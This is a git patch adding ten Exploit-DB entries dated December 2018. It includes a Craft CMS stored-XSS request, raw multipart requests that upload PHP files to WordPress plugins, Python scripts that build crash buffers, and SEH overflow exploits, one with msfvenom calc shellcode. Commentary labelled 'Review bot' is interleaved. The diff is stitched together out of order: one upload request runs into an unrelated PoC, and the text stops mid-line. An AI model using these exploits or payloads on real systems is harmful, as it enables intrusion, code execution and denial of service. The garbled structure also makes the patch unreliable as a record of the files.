From a6aa1db161ee4b442e92186d98f4723145d32fdb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Dec 2018 05:01:43 +0000 Subject: [PATCH] DB: 2018-12-28 10 changes to exploits/shellcodes Product Key Explorer 4.0.9 - Denial of Service (PoC) NetShareWatcher 1.5.8 - Denial of Service (PoC) ShareAlarmPro 2.1.4 - Denial of Service (PoC) MAGIX Music Editor 3.1 - Buffer Overflow (SEH) Terminal Services Manager 3.1 - Local Buffer Overflow (SEH) Iperius Backup 5.8.1 - Buffer Overflow (SEH) Craft CMS 3.0.25 - Cross-Site Scripting WordPress Plugin Audio Record 1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload --- exploits/php/webapps/46054.txt | 39 ++++++++++++++++ exploits/php/webapps/46055.txt | 57 +++++++++++++++++++++++ exploits/php/webapps/46060.txt | 34 ++++++++++++++ exploits/php/webapps/46061.txt | 40 ++++++++++++++++ exploits/windows_x86/dos/46057.py | 46 ++++++++++++++++++ exploits/windows_x86/dos/46062.py | 31 +++++++++++++ exploits/windows_x86/dos/46063.py | 29 ++++++++++++ exploits/windows_x86/local/46056.py | 72 +++++++++++++++++++++++++++++ exploits/windows_x86/local/46058.py | 61 ++++++++++++++++++++++++ exploits/windows_x86/local/46059.py | 64 +++++++++++++++++++++++++ files_exploits.csv | 10 ++++ 11 files changed, 483 insertions(+) create mode 100644 exploits/php/webapps/46054.txt create mode 100644 exploits/php/webapps/46055.txt create mode 100644 exploits/php/webapps/46060.txt create mode 100644 exploits/php/webapps/46061.txt create mode 100755 exploits/windows_x86/dos/46057.py create mode 100755 exploits/windows_x86/dos/46062.py create mode 100755 exploits/windows_x86/dos/46063.py create mode 100755 exploits/windows_x86/local/46056.py create mode 100755 exploits/windows_x86/local/46058.py create mode 100755 exploits/windows_x86/local/46059.py 
diff --git a/exploits/php/webapps/46054.txt b/exploits/php/webapps/46054.txt
new file mode 100644
index 000000000..e6ba9451b
--- /dev/null
+++ b/exploits/php/webapps/46054.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-12-20
+# Exploit Author: Raif Berkay Dincel
+# Contact: www.raifberkaydincel.com
+# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html
+# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md
+# Vendor Homepage: craftcms.com
+# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ]
+# Affected Version: [ 3.0.25 ]
+# CVE-ID: CVE-2018-20418
+# Tested on: Kali Linux / Linux Mint / Windows 10
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
+# Attack Pattern:
+
+# Description
+
+Allows it to run a Cross-Site Scripting by saving a new title from the console tab.
+
+# Proof of Concepts:
+
+POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Registered-Asset-Bundles: 
,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset
+X-Registered-Js-Files: 
,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorOverrides.min.js?v
=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412
+X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo=
+Content-Length: 857
+Connection: close
+Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; 
CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1
+Cache-Control: no-transform
+
+enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=§ionId=2&typeId=2
\ No newline at end of file
diff --git a/exploits/php/webapps/46055.txt b/exploits/php/webapps/46055.txt
new file mode 100644
index 000000000..be763b7c2
--- /dev/null
+++ b/exploits/php/webapps/46055.txt
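Review bot: The write-up never states what privilege the request needs; the PoC's Cookie header carries a Craft identity cookie whose username payload is `admin` together with a `CRAFT_CSRF_TOKEN`, and the path is `admin/actions/entries/save-entry`, so this is stored XSS that requires an authenticated control-panel session able to save entries. Saying so on the `# Description` line, e.g. `Authenticated stored XSS via the entry title, saved from the control panel`, lets readers judge impact correctly, and the empty `# Attack Pattern:` line should either name the injected parameter (`title`) or be dropped. The request body ends in `§ionId=2`, which looks like an HTML-entity rendering of `&sectionId=2`; the stored file should carry the literal parameter or the request will not replay as written.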
@@ -0,0 +1,57 @@
+# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
+# Date: 2018-12-24
+# Software Link: https://wordpress.org/plugins/audio-record/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 1.0
+# Category: webapps
+
+# Unrestricted file upload in record upload process allowing arbitrary extension.
+# File: recorder.php
+# Vulnerable code:
+function save_record_callback() {
+
+ foreach(array('audio') as $type) {
+ if (isset($_FILES["${type}-blob"])) {
+
+ $fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
+ $path_array = wp_upload_dir();
+ $path = str_replace('\\', '/', $path_array['path']);
+ $uploadDirectory = $path . "/$fileName";
+ if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
+ echo 000;
+ wp_die("problem moving uploaded file");
+ }
+
+
+# Exploitation example:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: example.com
+Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
+...
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-filename"
+
+file.php
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-blob"; filename="blob"
+Content-Type: audio/wav
+
+
+
+-----------------------------26228568510541774541866388118--
\ No newline at end of file
diff --git a/exploits/php/webapps/46061.txt b/exploits/php/webapps/46061.txt
new file mode 100644
index 000000000..924b533bf
--- /dev/null
+++ b/exploits/php/webapps/46061.txt
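Review bot: The header does not say whether `save_record_callback()` is reachable before authentication: it is an admin-ajax handler, and the excerpt shows no nonce or capability check, but it also does not show how the action is registered (`wp_ajax_nopriv_` versus `wp_ajax_` only), which is what decides pre- versus post-auth severity, so the write-up should state it. The root cause worth naming under `# Vulnerable code:` is that `$_POST["audio-filename"]` becomes the stored name with only a `uniqid()` prefix and no extension or MIME allow-list, and the file is written into the web-served directory returned by `wp_upload_dir()`. For the vendor, the fix is to guard the handler with `check_ajax_referer()` and a capability check and to pass the upload through `wp_handle_upload()` with a `mimes` allow-list and `sanitize_file_name()`.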
@@ -0,0 +1,40 @@ +# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload +# Date: 2018-12-24 +# Software Link: https://wordpress.org/plugins/baggage-freight/ +# Exploit Author: Kaimi +# Website: https://kaimi.io +# Version: 0.1.0 +# Category: webapps + +# Unrestricted file upload for unahtorized user in package info upload +# process allowing arbitrary extension. + +File: upload-package.php + +Vulnerable code: +if($_POST["submit"]) +{ + if ($_FILES["file"]) + { + $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"]; + + move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath); + +# Exploitation example: + +POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1 +Host: example.com +Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851 +... +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="submit" + +1 +-----------------------------18311719029180117571501079851 +Content-Disposition: form-data; name="file"; filename="file.php" +Content-Type: audio/wav + + Register... in tool bar +# 4. Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field +# 5. Click OK and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 2000 +buffer += "\x42" * 2000 +buffer += "\x43" * 1000 + +payload = buffer +try: + f=open("PoC.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/46062.py b/exploits/windows_x86/dos/46062.py new file mode 100755 index 000000000..91c4afa9e --- /dev/null +++ b/exploits/windows_x86/dos/46062.py 
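Review bot: The header line `Unrestricted file upload for unahtorized user` understates the defect as far as the excerpt shows: the request goes straight to `/wp-content/plugins/baggage-freight/upload-package.php`, so the script runs outside the WordPress bootstrap and `if($_POST["submit"])` is the only gate, with no login, nonce or capability check, while `$_FILES["file"]["name"]` is used with just a `time()` prefix into a web-served `upload/` directory. Suggest restating it as `Unauthenticated arbitrary file upload: upload-package.php is directly reachable and trusts the client-supplied file name`. The vendor fix is `defined('ABSPATH') || exit;` at the top, an `is_user_logged_in()`/`current_user_can()` plus nonce check, and `wp_handle_upload()` with a `mimes` allow-list and `sanitize_file_name()`. The hunk as rendered here breaks off after `Content-Type: audio/wav` and runs into an unrelated Python PoC, so its remaining lines could not be reviewed.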
@@ -0,0 +1,31 @@
+# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version: NetShareWatcher 1.5.8
+# Tested on: Windows 7 SP1 x86
+# Other software from the vendor affected
+# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+
+# PoC:
+# 1. Download and install the setup file
+# 2. A file "PoC.txt" will be created
+# 3. Click Help > Register... in tool bar
+# 4. Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field
+# 5. Click OK and BOOMMMM !!!!
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5256
+
+payload = buffer
+try:
+ f=open("PoC.txt","w")
+ print "[+] Creating %s bytes payload..." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/46063.py b/exploits/windows_x86/dos/46063.py
new file mode 100755
index 000000000..8c4a3452f
--- /dev/null
+++ b/exploits/windows_x86/dos/46063.py
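Review bot: The PoC steps in 46062.py contradict the script: step 2 says `PoC.txt` will be created, step 4 reads from `PoV.txt`, and neither step says to run this script, which is what actually writes the file; 46063.py repeats the same lines. Suggest `# 2. Run this script; it writes "PoC.txt" to the current directory` and `# 4. Copy the contents of PoC.txt and paste them into the Registration Key/Name field`. The bare `except:` also discards the real reason a write failed and skips `f.close()` if `f.write` raises; `with open("PoC.txt", "w") as f: f.write(payload)` inside the `try` and `except IOError as e: print "File cannot be created: %s" % e` keep the file's Python 2 style while fixing both.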
@@ -0,0 +1,29 @@
+# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version:ShareAlarmPro 2.1.4
+# Tested on: Windows 7 SP1 x86
+
+# PoC:
+# 1. Download and install the setup file
+# 2. A file "PoC.txt" will be created
+# 3. Click Help > Register... in tool bar
+# 4. Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field
+# 5. Click OK and BOOMMMM !!!!
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5000
+
+payload = buffer
+try:
+ f=open("PoC.txt","w")
+ print "[+] Creating %s bytes payload..." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/46056.py b/exploits/windows_x86/local/46056.py
new file mode 100755
index 000000000..ea7b8c663
--- /dev/null
+++ b/exploits/windows_x86/local/46056.py
@@ -0,0 +1,72 @@ +# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH) +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 2018-12-24 +# Vulnerable Software: MAGIX Music Editor 3.1 +# Vendor Homepage: https://www.magix.com/us/ +# Version: 3.1 +# Software Link: https://www.magix.com/us/music/mp3-deluxe/ +# Music Editor Software is bundled with MP3 Deluxe 19 +# Tested Windows 7 SP1 x86 + +# PoC +# 1. run script +# 2. open music editor 3 +# 3. go to CD > freedb options > FreeDB Proxy Options +# 4. copy/paste magix.txt contents into Server field +# 5. select Accept settings +# 6. pop calc + +#!/usr/bin/python + +filename="magix.txt" + +#lol +junk = "A"*420 + +#jump 6 +nseh = "\xeb\x06\xcc\xcc" + +#0x10015b08 : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [dac3x.dll] +seh = "\x08\x5b\x01\x10" + +#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c +#Payload size: 447 bytes +calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" +"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69" +"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e" +"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72" +"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e" +"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71" +"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56" +"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b" +"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66" +"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59" +"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76" +"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d" +"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71" 
+"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78" +"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74" +"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b" +"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46" +"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f" +"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c" +"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70" +"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f" +"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76" +"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35" +"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65" +"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33" +"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53" +"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41") + +fill = "C"*2000 + +buffer = junk + nseh + seh + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/46058.py b/exploits/windows_x86/local/46058.py new file mode 100755 index 000000000..0bef80597 --- /dev/null +++ b/exploits/windows_x86/local/46058.py 
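Review bot: The file write at the end of 46056.py opens `magix.txt` with `open(filename , 'w')` and closes it by hand, so an exception from `write` leaks the handle and leaves a partial file behind; `with open(filename, 'w') as textfile: textfile.write(buffer)` replaces the three lines and drops the stray space before the comma. The `#lol` comment above `junk` documents nothing, unlike the `#jump 6` and address comments on `nseh` and `seh`; a plain `# 420 bytes of filler ahead of nseh` in the same style would do.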
@@ -0,0 +1,61 @@ +# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH) +# Date: 2018-12-25 +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Vulnerable Software: Terminal Services Manager 3.1 +# Vendor Homepage: https://lizardsystems.com +# Version: 3.1 +# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe +# Tested Windows 7 SP1 x86 + +# Other affected software from the vendor +# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe +# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe +# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe + +# PoC +# 1. run script +# 2. run add computers wizard +# 3. select import from files +# 4. paste tsmang.txt into computer names field +# 5. pop calc + +#bad chars \x00\x0d\x0e + +#!/usr/bin/python + +import struct + +junk2 = "A"*100 +junk1 = "B"*74 +jmp2 = "\xe9\x71\xfe\xff\xff\xcc" +jmp1 = "\xeb\xf8\xcc\xcc" + +#0x0049709f : pop esi # pop ebx # ret tsmanager.exe +seh = struct.pack('